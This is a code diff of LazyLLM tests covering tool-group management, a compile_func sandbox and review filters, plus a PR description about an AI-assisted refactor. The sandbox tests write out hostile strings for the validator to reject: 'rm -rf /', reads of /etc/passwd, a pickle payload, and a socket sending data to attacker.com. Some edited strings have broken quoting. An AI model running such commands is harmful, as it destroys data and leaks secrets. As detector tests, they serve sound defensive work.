+        assert 'c' not in names
         tm._tool_call['get_inner_methods']({})
         names = [d['function']['name'] for d in tm.tools_description]
         assert 'get_outer_methods' not in names
@@ -416,6 +429,11 @@ class TestToolGroup:
             t1,
             dict(name='inner', desc='Inner', lazy=False, tools=[t2, t3]),
         ])])
+        names = [d['function']['name'] for d in tm.tools_description]
+        assert 'a' not in names
+        assert 'b' not in names
+        assert 'c' not in names
+        assert 'get_inner_methods' not in names
         tm._tool_call['get_outer_methods']({})
         names = [d['function']['name'] for d in tm.tools_description]
         assert 'a' in names
@@ -664,3 +682,125 @@ class TestSkipMixinNormalizeSource:
 
         mixin = SkipMixin(optional_arg)
         assert not mixin.should_skip()
+
+
+class TestShouldSkipTransitions:
+    def setup_method(self):
+        init_session()
+        lazyllm_locals['_lazyllm_agent'] = {'workspace': {}}
+        # register test-only config keys once (idempotent via _supported_configs set)
+        lazyllm.globals.config.add('test_skip_api_key', str, None, 'TEST_SKIP_API_KEY',
+                                   description='test key for should_skip transitions')
+        lazyllm.globals.config.add('test_skip_dot_key', str, None, 'TEST_SKIP_DOT_KEY',
+                                   description='test key for globals.config.xxx format')
+        lazyllm.globals.config.add('mock_fs_token', str, None, 'MOCK_FS_TOKEN',
+                                   description='test key for CredentialMixin skip transitions')
+        lazyllm.globals.config.add('test_wrapper_cfg_key', str, None, 'TEST_WRAPPER_CFG_KEY',
+                                   description='test key for ToolGroupWrapper globals.config')
+
+    # ------------------------------------------------------------------ #
+    # InstanceToolGroup — globals.config string key_source (bare key)
+    # ------------------------------------------------------------------ #
+    def test_instance_group_globals_config_key_skip_then_available(self):
+        inst = MockSearchForTest()
+        grp = InstanceToolGroup(inst, 'test_skip_api_key')
+        assert grp.should_skip() is True
+        lazyllm.globals.config['test_skip_api_key'] = 'secret'
+        assert grp.should_skip() is False
+        lazyllm.globals.config['test_skip_api_key'] = None
+
+    def test_instance_group_globals_config_dot_prefix_skip_then_available(self):
+        inst = MockSearchForTest()
+        grp = InstanceToolGroup(inst, 'globals.config.test_skip_dot_key')
+        assert grp.should_skip() is True
+        lazyllm.globals.config['test_skip_dot_key'] = 'token-xyz'
+        assert grp.should_skip() is False
+        lazyllm.globals.config['test_skip_dot_key'] = None
+
+    # ------------------------------------------------------------------ #
+    # InstanceToolGroup — CredentialMixin auto key_source via __key_source__
+    # ------------------------------------------------------------------ #
+    def test_instance_group_credential_mixin_skip_then_available(self):
+        from lazyllm.common import CredentialMixin
+        from lazyllm.common.auth import Credential
+
+        class MockFS(CredentialMixin):
+            __public_apis__ = ['read']
+
+            def __init__(self):
+                self.__init_credential__(Credential(kind='dynamic'))
+
+            def _resolve_dynamic_token(self) -> str:
+                try:
+                    return lazyllm.globals.config['mock_fs_token'] or ''
+                except Exception:
+                    return ''
+
+            def read(self, path: str) -> str:
+                '''Read a file.
+
+                Args:
+                    path (str): File path.
+
+                Returns:
+                    str: File content.
+                '''
+                return ''
+
+        inst = MockFS()
+        grp = InstanceToolGroup(inst)
+        # no token yet → should skip
+        assert grp.should_skip() is True
+        # inject token via globals.config
+        lazyllm.globals.config['mock_fs_token'] = 'user-token-abc'
+        assert grp.should_skip() is False
+        lazyllm.globals.config['mock_fs_token'] = None
+
+    # ------------------------------------------------------------------ #
+    # ToolGroupWrapper — callable key_source, mutate state
+    # ------------------------------------------------------------------ #
+    def test_wrapper_callable_skip_then_available_via_state(self):
+        from lazyllm.tools.agent.toolsManager import ToolGroupWrapper
+        t = _make_tool_func('state_tool')
+        state = {'key': ''}
+        wrapper = ToolGroupWrapper(t, lambda _inst: state['key'])
+        assert wrapper.should_skip() is True
+        state['key'] = 'valid-key'
+        assert wrapper.should_skip() is False
+
+    # ------------------------------------------------------------------ #
+    # ToolGroupWrapper — globals.config string key_source
+    # ------------------------------------------------------------------ #
+    def test_wrapper_globals_config_skip_then_available(self):
+        from lazyllm.tools.agent.toolsManager import ToolGroupWrapper
+        t = _make_tool_func('cfg_tool')
+        wrapper = ToolGroupWrapper(t, 'test_wrapper_cfg_key')
+        assert wrapper.should_skip() is True
+        lazyllm.globals.config['test_wrapper_cfg_key'] = 'present'
+        assert wrapper.should_skip() is False
+        lazyllm.globals.config['test_wrapper_cfg_key'] = None
+
+    # ------------------------------------------------------------------ #
+    # dict tool group with key_source — via ToolManager
+    # ------------------------------------------------------------------ #
+    def test_dict_group_key_source_skip_then_available(self):
+        t1, t2 = _make_tool_func('da'), _make_tool_func('db')
+        state = {'key': ''}
+        tm = ToolManager([dict(name='dgrp', desc='D group', tools=[t1, t2],
+                               key_source=lambda _inst: state['key'])])
+        assert len(tm.tools_description) == 0
+        state['key'] = 'unlocked'
+        # lazy mode: gateway tool becomes visible
+        assert len(tm.tools_description) == 1
+        assert tm.tools_description[0]['function']['name'] == 'get_dgrp_methods'
+
+    # ------------------------------------------------------------------ #
+    # SkipMixin — multi-source: both empty → skip; one becomes non-empty → available
+    # ------------------------------------------------------------------ #
+    def test_skip_mixin_multi_source_both_empty_then_one_fills(self):
+        from lazyllm.tools.agent.toolsManager import SkipMixin
+        state = {'a': '', 'b': ''}
+        mixin = SkipMixin([lambda _: state['a'], lambda _: state['b']])
+        assert mixin.should_skip() is True
+        state['b'] = 'filled'
+        assert mixin.should_skip() is False

--- a/tests/advanced_tests/Tools/test_tools_manager.py
+++ b/tests/advanced_tests/Tools/test_tools_manager.py
@@ -358,7 +358,7 @@ class TestToolGroup:
         assert 'beta' in result
 
         names = [d['function']['name'] for d in tm.tools_description]
-        assert 'get_grp_methods' in names
+        assert 'get_grp_methods' not in names
         assert 'alpha' in names
         assert 'beta' in names
 
@@ -389,7 +389,7 @@ class TestToolGroup:
         ])])
         tm._tool_call['get_outer_methods']({})
         names = [d['function']['name'] for d in tm.tools_description]
-        assert 'get_outer_methods' in names
+        assert 'get_outer_methods' not in names
         assert 'a' in names
         assert 'get_inner_methods' in names
         assert 'b' not in names
@@ -404,6 +404,9 @@ class TestToolGroup:
         tm._tool_call['get_outer_methods']({})
         tm._tool_call['get_inner_methods']({})
         names = [d['function']['name'] for d in tm.tools_description]
+        assert 'get_outer_methods' not in names
+        assert 'get_inner_methods' not in names
+        assert 'a' in names
         assert 'b' in names
         assert 'c' in names
 

--- a/tests/basic_tests/Common/test_common.py
+++ b/tests/basic_tests/Common/test_common.py
@@ -107,11 +107,11 @@ class TestCommon(object):
         assert square(18) == 324
 
     def test_compile_func_dangerous_code(self):
-        func1 = '''def use_exec():\n    exec('print('This is unsafe')')'''
+        func1 = '''def use_exec():\n    exec('print("This is unsafe")')'''
         with pytest.raises(ValueError, match='⚠️ Detected dangerous function call: exec'):
             compile_func(func1)
 
-        func2 = '''def del_file():\n    eval('__import__('os').system('rm -rf /')')'''
+        func2 = '''def del_file():\n    eval('__import__("os").system("rm -rf /")')'''
         with pytest.raises(ValueError, match='⚠️ Detected dangerous function call: eval'):
             compile_func(func2)
 
@@ -119,12 +119,12 @@ class TestCommon(object):
         with pytest.raises(ValueError, match='⚠️ Detected dangerous function call: open'):
             compile_func(func3)
 
-        func4 = ('''def comiple_function():\n    code = compile('os.system('rm -rf /')', '''
+        func4 = ('''def comiple_function():\n    code = compile('os.system("rm -rf /")', '''
                  ''''<string>', 'exec')\n    exec(code)''')
         with pytest.raises(ValueError, match='⚠️ Detected dangerous function call: compile'):
             compile_func(func4)
 
-        func5 = '''def get_attr():\n    getattr(__builtins__, 'eval')('os.system('rm -rf /')')'''
+        func5 = '''def get_attr():\n    getattr(__builtins__, "eval")('os.system("rm -rf /")')'''
         with pytest.raises(ValueError, match='⚠️ Detected dangerous function call: getattr'):
             compile_func(func5)
 

--- a/tests/basic_tests/Common/test_common.py
+++ b/tests/basic_tests/Common/test_common.py
@@ -48,10 +48,8 @@ class TestCommon(object):
         assert lazyllm_merge_query(query) == query
         assert lazyllm_merge_query(query, query, query) == query * 3
         assert lazyllm_merge_query(query, encode) == '<lazyllm-query>{"query": "hihi", "files": ["a", "b"]}'
-        assert lazyllm_merge_query(encode, encode) == ('<lazyllm-query>{"query": "hihi", "files": '
-                                                       '["a", "b", "a", "b"]}')
-        assert lazyllm_merge_query(encode, query, query) == ('<lazyllm-query>{"query": "hihihi", '
-                                                             '"files": ["a", "b"]}')
+        assert lazyllm_merge_query(encode, encode) == ('<lazyllm-query>{"query": "hihi", "files": ["a", "b", "a", "b"]}')
+        assert lazyllm_merge_query(encode, query, query) == ('<lazyllm-query>{"query": "hihihi", "files": ["a", "b"]}')
 
     def test_common_cmd(self):
 
@@ -98,75 +96,75 @@ class TestCommon(object):
         assert lazyllm.make_repr('c', 3, subs=[r1, r2]) == '<c type=3>'
 
     def test_compile_func(self):
-        str1 = "def identity(v): return v"
+        str1 = 'def identity(v): return v'
         identity = compile_func(str1)
-        assert identity("abc") == "abc"
+        assert identity('abc') == 'abc'
         assert identity(12345) == 12345
 
-        str2 = "def square(v): return v * v"
+        str2 = 'def square(v): return v * v'
         square = compile_func(str2)
         assert square(3) == 9
         assert square(18) == 324
 
     def test_compile_func_dangerous_code(self):
-        func1 = """def use_exec():\n    exec('print("This is unsafe")')"""
-        with pytest.raises(ValueError, match="⚠️ Detected dangerous function call: exec"):
+        func1 = '''def use_exec():\n    exec('print('This is unsafe')')'''
+        with pytest.raises(ValueError, match='⚠️ Detected dangerous function call: exec'):
             compile_func(func1)
 
-        func2 = """def del_file():\n    eval("__import__('os').system('rm -rf /')")"""
-        with pytest.raises(ValueError, match="⚠️ Detected dangerous function call: eval"):
+        func2 = '''def del_file():\n    eval('__import__('os').system('rm -rf /')')'''
+        with pytest.raises(ValueError, match='⚠️ Detected dangerous function call: eval'):
             compile_func(func2)
 
-        func3 = """def read_file():\n    open("/etc/passwd", "r").read()"""
-        with pytest.raises(ValueError, match="⚠️ Detected dangerous function call: open"):
+        func3 = '''def read_file():\n    open('/etc/passwd', 'r').read()'''
+        with pytest.raises(ValueError, match='⚠️ Detected dangerous function call: open'):
             compile_func(func3)
 
-        func4 = ("""def comiple_function():\n    code = compile("os.system('rm -rf /')", """
-                 """"<string>", "exec")\n    exec(code)""")
-        with pytest.raises(ValueError, match="⚠️ Detected dangerous function call: compile"):
+        func4 = ('''def comiple_function():\n    code = compile('os.system('rm -rf /')', '''
+                 ''''<string>', 'exec')\n    exec(code)''')
+        with pytest.raises(ValueError, match='⚠️ Detected dangerous function call: compile'):
             compile_func(func4)
 
-        func5 = """def get_attr():\n    getattr(__builtins__, "eval")("os.system('rm -rf /')")"""
-        with pytest.raises(ValueError, match="⚠️ Detected dangerous function call: getattr"):
+        func5 = '''def get_attr():\n    getattr(__builtins__, 'eval')('os.system('rm -rf /')')'''
+        with pytest.raises(ValueError, match='⚠️ Detected dangerous function call: getattr'):
             compile_func(func5)
 
     def test_compile_func_dangerous_os_operation(self):
-        func1 = """import os\ndef use_system():\n    os.system("rm -rf /")"""
-        with pytest.raises(ValueError, match="⚠️ Detected dangerous os call: os.system"):
+        func1 = '''import os\ndef use_system():\n    os.system('rm -rf /')'''
+        with pytest.raises(ValueError, match='⚠️ Detected dangerous os call: os.system'):
             compile_func(func1)
 
-        func2 = """import os\ndef use_popen():\n    os.popen("cat /etc/passwd").read()"""
-        with pytest.raises(ValueError, match="⚠️ Detected dangerous os call: os.popen"):
+        func2 = '''import os\ndef use_popen():\n    os.popen('cat /etc/passwd').read()'''
+        with pytest.raises(ValueError, match='⚠️ Detected dangerous os call: os.popen'):
             compile_func(func2)
 
     def test_compile_func_dangerous_sys_operation(self):
-        func1 = """import sys\ndef use_exit():\n    sys.exit(1)\n"""
-        with pytest.raises(ValueError, match="⚠️ Detected dangerous sys call: sys.exit"):
+        func1 = '''import sys\ndef use_exit():\n    sys.exit(1)\n'''
+        with pytest.raises(ValueError, match='⚠️ Detected dangerous sys call: sys.exit'):
             compile_func(func1)
 
     def test_compile_func_dangerous_import(self):
-        func1 = ("""import pickle\ndef load_cmd():\n    """
-                 """malicious_data = pickle.dumps({"command": lambda: __import__("os").system("rm -rf /")})\n"""
-                 """    pickle.loads(malicious_data)""")
-        with pytest.raises(ValueError, match="⚠️ Detected dangerous module import: pickle"):
+        func1 = ('''import pickle\ndef load_cmd():\n    '''
+                 '''malicious_data = pickle.dumps({'command': lambda: __import__('os').system('rm -rf /')})\n'''
+                 '''    pickle.loads(malicious_data)''')
+        with pytest.raises(ValueError, match='⚠️ Detected dangerous module import: pickle'):
             compile_func(func1)
 
-        func2 = """import subprocess\ndef del_all():\n    subprocess.run("rm -rf /", shell=True)"""
-        with pytest.raises(ValueError, match="⚠️ Detected dangerous module import: subprocess"):
+        func2 = '''import subprocess\ndef del_all():\n    subprocess.run('rm -rf /', shell=True)'''
+        with pytest.raises(ValueError, match='⚠️ Detected dangerous module import: subprocess'):
             compile_func(func2)
 
-        func3 = ("""import socket\ndef send_data():\n    s = socket.socket()\n    s.connect(("attacker.com", 80))\n"""
-                 """    s.send(b"Sensitive data")""")
-        with pytest.raises(ValueError, match="⚠️ Detected dangerous module import: socket"):
+        func3 = ('''import socket\ndef send_data():\n    s = socket.socket()\n    s.connect(('attacker.com', 80))\n'''
+                 '''    s.send(b'Sensitive data')''')
+        with pytest.raises(ValueError, match='⚠️ Detected dangerous module import: socket'):
             compile_func(func3)
 
-        func4 = """from shutil import rmtree\ndef del_file():\n    rmtree("important_file.txt")"""
-        with pytest.raises(ValueError, match="⚠️ Detected dangerous module import: shutil"):
+        func4 = '''from shutil import rmtree\ndef del_file():\n    rmtree('important_file.txt')'''
+        with pytest.raises(ValueError, match='⚠️ Detected dangerous module import: shutil'):
             compile_func(func4)
 
     def test_compile_func_dangerous_attr(self):
-        func1 = """import os\ndef set_path():\n    os.environ['PATH'] = '/malicious/path'"""
-        with pytest.raises(ValueError, match="⚠️ Detected dangerous access: os.environ"):
+        func1 = '''import os\ndef set_path():\n    os.environ['PATH'] = "/malicious/path"'''
+        with pytest.raises(ValueError, match='⚠️ Detected dangerous access: os.environ'):
             compile_func(func1)
 
 
@@ -196,10 +194,15 @@ class TestCommonOnce(object):
         with pytest.raises(RuntimeError, match='once exception'):
             self.once_func_with_exception()
         assert self._count == 1
-        assert self.once_func_with_exception.flag
+        assert not self.once_func_with_exception.flag
         with pytest.raises(RuntimeError, match='once exception'):
             self.once_func_with_exception()
-        assert self._count == 1
+        assert self._count == 2
+        self.once_func()
+        assert self._count == 3
+        assert self.once_func.flag
+        self.once_func()
+        assert self._count == 3
 
 
 class TestCommonGlobals(object):

--- a/tests/basic_tests/Tools/test_git_review_lineno.py
+++ b/tests/basic_tests/Tools/test_git_review_lineno.py
@@ -456,7 +456,7 @@ class TestCommentableFilter:
         assert len(inline + general) == 2
         assert dropped == 0
 
-    def test_filter_drops_out_of_range(self):
+    def test_filter_demotes_out_of_range(self):
         hunks = self._make_hunks([('foo.py', 10, 5)])
         cm = _build_commentable_lines(hunks)
         comments = [
@@ -465,18 +465,18 @@ class TestCommentableFilter:
             {'path': 'foo.py', 'line': 12},  # valid
         ]
         inline, general, dropped = _filter_commentable(comments, cm)
-        kept = inline + general
-        assert len(kept) == 1
-        assert kept[0]['line'] == 12
-        assert dropped == 2
+        assert len(inline) == 1 and inline[0]['line'] == 12
+        assert len(general) == 2
+        assert dropped == 0
 
-    def test_filter_drops_unknown_file(self):
+    def test_filter_demotes_unknown_file(self):
         hunks = self._make_hunks([('foo.py', 1, 10)])
         cm = _build_commentable_lines(hunks)
         comments = [{'path': 'other.py', 'line': 5}]
         inline, general, dropped = _filter_commentable(comments, cm)
-        assert inline + general == []
-        assert dropped == 1
+        assert inline == []
+        assert len(general) == 1
+        assert dropped == 0
 
     def test_filter_drops_missing_line(self):
         hunks = self._make_hunks([('foo.py', 1, 10)])
@@ -546,7 +546,7 @@ class TestCommentableFilter:
         inline, general, dropped = _filter_commentable([{'path': 'f.py', 'line': 11}], cm)
         assert len(inline + general) == 1 and dropped == 0
 
-    def test_filter_drops_line_beyond_content_with_content(self):
+    def test_filter_demotes_line_beyond_content_with_content(self):
         content = '+add1\n ctx'   # new-file lines 5, 6
         hunks = [('f.py', 5, 0, content)]
         cm = _build_commentable_lines(hunks)
@@ -556,7 +556,6 @@ class TestCommentableFilter:
             {'path': 'f.py', 'line': 5},   # valid
         ]
         inline, general, dropped = _filter_commentable(comments, cm)
-        kept = inline + general
-        assert len(kept) == 1
-        assert kept[0]['line'] == 5
-        assert dropped == 2
+        assert len(inline) == 1 and inline[0]['line'] == 5
+        assert len(general) == 2
+        assert dropped == 0

--- a/tests/basic_tests/Tools/test_http_node.py
+++ b/tests/basic_tests/Tools/test_http_node.py
@@ -1,8 +1,15 @@
+from lazyllm.thirdparty import httpx
 from lazyllm.tools.http_request.http_request import HttpRequest
+
 
 class TestHTTPRequest(object):
 
-    def test_http_request(self):
+    def test_http_request(self, monkeypatch):
+        mock_resp = httpx.Response(200, json={'origin': '127.0.0.1'})
+        monkeypatch.setattr(
+            'lazyllm.tools.http_request.http_request.httpx.request',
+            lambda **kwargs: mock_resp,
+        )
         http_request = HttpRequest('get', 'https://httpbin.org/ip', api_key='', headers={}, params={}, body='')
         r = http_request()
         assert r['status_code'] == 200

--- a/tests/basic_tests/Tools/test_pipeline_offline.py
+++ b/tests/basic_tests/Tools/test_pipeline_offline.py
@@ -62,11 +62,12 @@ class TestF1bDeterministicDedup(unittest.TestCase):
 
     def test_same_path_line_category_keeps_highest_priority(self):
         from lazyllm.tools.git.review.rounds import _deterministic_dedup
+        problem = 'null pointer dereference when accessing foo.bar'
         issues = [
             {'path': 'x.py', 'line': 5, 'bug_category': 'logic', 'severity': 'normal',
-             'problem': 'r1 issue', 'source': 'r1'},
+             'problem': problem, 'source': 'r1'},
             {'path': 'x.py', 'line': 5, 'bug_category': 'logic', 'severity': 'normal',
-             'problem': 'r3 issue', 'source': 'r3'},
+             'problem': problem + ' in handler', 'source': 'r3'},
         ]
         result = _deterministic_dedup(issues)
         self.assertEqual(len(result), 1)

--- a/tests/basic_tests/Tracing/test_concurrency.py
+++ b/tests/basic_tests/Tracing/test_concurrency.py
@@ -47,18 +47,16 @@ def _assert_parallel_trace_group(spans):
 
 def _assert_loop_parallel_trace_group(spans):
     assert len(spans) == 10
-    loop_span = spans[-1]
-    assert loop_span.name == 'Loop'
+    loop_span = next(s for s in spans if s.name == 'Loop')
     assert all(span.context.trace_id == loop_span.context.trace_id for span in spans)
 
-    for iteration in range(3):
-        start = iteration * 3
-        children = spans[start:start + 2]
-        parallel_span = spans[start + 2]
-        assert parallel_span.name == 'Parallel'
+    parallel_spans = [s for s in spans if s.name == 'Parallel']
+    assert len(parallel_spans) == 3
+    for parallel_span in parallel_spans:
         assert parallel_span.parent.span_id == loop_span.context.span_id
-        assert {span.name for span in children} == {'increment', 'keep_zero'}
-        assert all(span.parent.span_id == parallel_span.context.span_id for span in children)
+        children = [s for s in spans if s.parent and s.parent.span_id == parallel_span.context.span_id]
+        assert len(children) == 2
+        assert {s.name for s in children} == {'increment', 'keep_zero'}
         _assert_overlapping(children)
 
 


### PR DESCRIPTION
# 📌 PR 内容 / PR Description

- 新增 `ToolGroup` / `InstanceToolGroup`，支持将工具按组管理，并通过 gateway 工具实现渐进式（lazy）工具选择
- 重构 `ToolManager` 的工具注册与描述生成逻辑，明确"构造时一次性注册，前向时动态生成描述"的设计原则
- 新增 `prefix` 参数，解决多组同名工具的命名冲突问题
- 新增 `TodoWrite` 工具，支持 Agent 会话内的 TODO 管理
- 修复 `flow._FuncWrap` 的 `isinstance` 判断，改用自定义 `__class__` 属性替代全局 monkey-patch

---

# 🎯 问题背景 / Problem Context

- 当工具数量较多时，将所有工具一次性暴露给大模型会导致 prompt 过长、工具选择准确率下降。需要一种机制让大模型先选择工具组，再按需展开具体工具（渐进式工具选择）。
- 不同工具组中可能存在同名工具（如两组 CRUD 工具），同时展开时会产生命名冲突，需要 prefix 机制解决。
- `ToolManager` 原有实现中，`_register_sub_groups` 与 `_format_tools` 存在重复逻辑，且工具描述每次前向都重新计算，存在性能浪费。

# 🔍 相关 Issue / Related Issue

*

---

# ✅ 变更类型 / Type of Change

* [x] New feature
* [x] Refactor
* [x] Performance optimization

---

# 🧪 如何测试 / How Has This Been Tested?

1. `LAZYLLM_DEFAULT_LAUNCHER=empty pytest -vvs tests/advanced_tests/Tools/test_tools_manager.py`（46 个测试全部通过）
2. `make lint-only-diff`（无新增 lint 错误）
3. `LAZYLLM_INIT_DOC=True python -c 'import lazyllm'`（文档注册无报错）

---

# 📷 Demo (Optional)

*

---

# ⚡ 更新后的用法示例 / Usage After Update

```python
import lazyllm
from lazyllm.tools import ToolManager

# 定义两组同名工具，通过 prefix 区分
local_group = {
    'name': 'local',
    'desc': 'Manage local files',
    'lazy': True,
    'tools': [local_insert, local_delete, local_update, local_query],
}
remote_group = {
    'name': 'remote',
    'desc': 'Manage remote database',
    'lazy': True,
    'tools': [remote_insert, remote_delete, remote_update, remote_query],
}

# prefix=True 自动用 group name 作前缀，避免同名冲突
tm = ToolManager([local_group, remote_group])

# 前向时大模型先看到两个 gateway 工具：get_local_methods / get_remote_methods
# 调用 gateway 后，对应组的子工具（local_insert 等）才出现在描述中
```

---

# 🔄 重构对比 / Refactor Comparison

## Before

```python
# ToolManager 感知 ToolGroup 内部细节，职责混乱
def _format_tools(self):
    for item in self._tools:
        if isinstance(item, ToolGroup):
            if item._lazy:                          # 感知 _lazy
                gateway = item.make_gateway_tool(self)  # 传入 self
                self._tool_call[gateway.name] = gateway
                self._tool_groups[item._name] = item
                self._register_sub_groups(item)     # 递归注册子组
            else:
                for name, tool in item.get_flat_tools().items():
                    self._tool_call[name] = tool
        else:
            self._tool_call[item.name] = item

# 描述每次前向都重新计算（docstring_parser.parse 重复调用）
def tools_description(self):
    static = [x for item in self._tools_desc
              for x in (item() if callable(item) else [item])]
    active_groups = workspace.get(active_key, [])
    extra = [desc for gname in active_groups
             if gname in self._tool_groups
             for desc in self._tool_groups[gname].get_child_descriptions()]
    return static + extra
```

## After

```python
# ToolManager 完全不感知 lazy/非 lazy，一行搞定
def _format_tools(self):
    for item in self._tools:
        for name, tool in (item.get_flat_tools() if isinstance(item, ToolGroup)
                           else {item.name: item}).items():
            if name in self._tool_call:
                raise ValueError(f'Duplicate tool name [{name}].')
            self._tool_call[name] = tool

# ToolGroup 构造时预算描述，前向时只做浅遍历
class ToolGroup:
    def __init__(self, ...):
        self._precompute_descs(effective_prefix)          # 构造时预算
        self._gateway_tool = self.make_gateway_tool() if lazy else None  # 构造时生成

    def get_description(self, active_groups=None) -> List[Dict]:
        if not self._lazy or self._name in (active_groups or set()):
            return [x for item in self._expanded_descs    # 直接取预算结果
                    for x in (item.get_description(active_groups)
                               if isinstance(item, ToolGroup) else [item])]
        return [self._gateway_desc]                       # 直接取预算结果
```

# ⚠️ 注意事项 / Additional Notes

- `ToolGroup` 的 `prefix` 参数默认为 `True`（自动用 group name 作前缀）。如需保持原始工具名，显式传 `prefix=False`，此时同名工具仍会报错。
- `InstanceToolGroup` 的 `should_skip` 逻辑已从基类 `ToolGroup` 下沉到 `InstanceToolGroup`，基类保留默认返回 `False` 的接口。
- workspace key 从 `_module_id`（UUID）改为固定字符串 `'_active_groups'`，因为构造时只有一个 `ToolManager` 实例，不需要隔离。

---

# 🧠 AI 参与情况 / AI Involvement

- [x] 使用 AI 主导（大部分代码）/ AI-led (majority of code)

**使用工具 / Tools Used：**
- [x] Cursor

# 🤖 AI 生成过程 / AI Generation Process

## 初始 Prompt / Initial Prompt

```text
我发现，ToolGroup 和 ToolManager 在处理和构造工具的时候，有一大段相同的逻辑，看看如何复用一下
```

## AI 初始输出质量 / Initial Output Quality

* [x] 部分正确 / Partially correct

## **问题点 / Issues：**

AI 初始方案只做了表面的代码复用（提取 `_build_tool_from_element`），没有深入理解"构造时注册 vs 前向时描述"这个核心分离原则，导致后续多处设计问题。

## 🔧 人工干预过程 / Human Intervention

### 第一次修正 / First Correction

**修改后的 Prompt / 操作 / Updated Prompt or Action：**

```text
假设某个组的工具已经展开并加进去了，是不是可以把 get_{group_name}_methods 拿掉呀
```

**原因 / Reason：**
AI 初始方案中，激活 group 后 gateway 工具和子工具并存，冗余。用户发现这个问题并推动修复。

### 第二次修正 / Second Correction

**修改后的 Prompt / 操作 / Updated Prompt or Action：**

```text
请你确认代码是否符合以下逻辑，如果不，请你修改，确保一定遵守：
1. ToolGroup 在构造的时候，如果 lazy，就提前生成好 gateway。
2. get_flat_tools 递归的返回所有的工具，如果 lazy，额外返回自己的 gateway
3. 在 ToolManager 构造的时候，应一次性获取并注册所有的工具给 ToolManager，即 ToolManager 始终有能力调用所有的工具，无论其是否启用
4. 在前向的时候，根据 should_skip，lazy，以及 gateway 调用的展开情况，动态的生成描述，给大模型看有哪些工具
切记，工具是一次性注册好的，描述是动态的
```

**原因 / Reason：**
AI 多次迭代后仍未能自发建立"构造/前向分离"的设计原则，用户明确给出了四条设计约束，强制对齐。

### 最终策略总结 / Final Strategy Summary

- 明确"构造时一次性注册，前向时动态描述"的核心原则后，AI 能够正确实现各个细节
- 用户通过一系列追问（`_module_id` 为何需要、`manager` 参数为何多余、`_collect_leaf_names` 展开语义是否正确等）持续推动设计收敛
- 最终 `_build_tool_from_element` 统一了所有输入格式，`_load_tool_by_name` 升级为模块级函数，`_load_tools` 简化为一行列表推导

---

# 📊 AI vs 人工贡献占比 / AI vs Human Contribution

* AI 生成代码占比 / AI-generated code：`85%`
* 人工修改占比 / Human modifications：`15%`

**主要人工修改点 / Key Human Modifications：**

* [x] 逻辑修正 / Logic fixes
* [x] 边界处理 / Edge case handling
* [x] 性能优化 / Performance optimization
* [x] 架构调整 / Architecture adjustments

---

# ⚠️ AI 问题记录 / AI Failure Cases

### ❌ 失败 Prompt 示例 / Failed Prompt Example

```text
为什么 get_flat_tools 要关心 manager？
```

### ❌ 问题表现 / Issue Description

AI 引入了 `get_flat_tools(manager=self)` 参数，把整个 `ToolManager` 对象传入 `ToolGroup`，只是为了拿 `_module_id` 一个字符串。这违反了最小依赖原则，且 `_module_id` 本身也是不必要的（构造时只有一个实例，不需要隔离）。

### ✅ 改进后 Prompt / Improved Prompt

```text
_module_id 不合理吧，用户看不到，而且它不具备实际意义，所以大模型也不好选；为什么不能用 dict 中的 name 呢
为什么要隔离，难道 make_gateway_tool 不是用在构造时候么，构造时候只有一份实例啊
```

# 🧩 可复用经验 / Reusable Patterns

* Prompt 模板 / Prompt template：明确给出"构造时 vs 运行时"的分离约束，比让 AI 自由发挥更有效
* 常见坑 / Common pitfalls：AI 倾向于在现有结构上打补丁，而不是从设计原则出发重构；需要用户主动给出设计约束
* 推荐做法 / Recommended practices：对于涉及生命周期（构造/前向）的设计，先用自然语言写清楚每个阶段的职责，再让 AI 实现
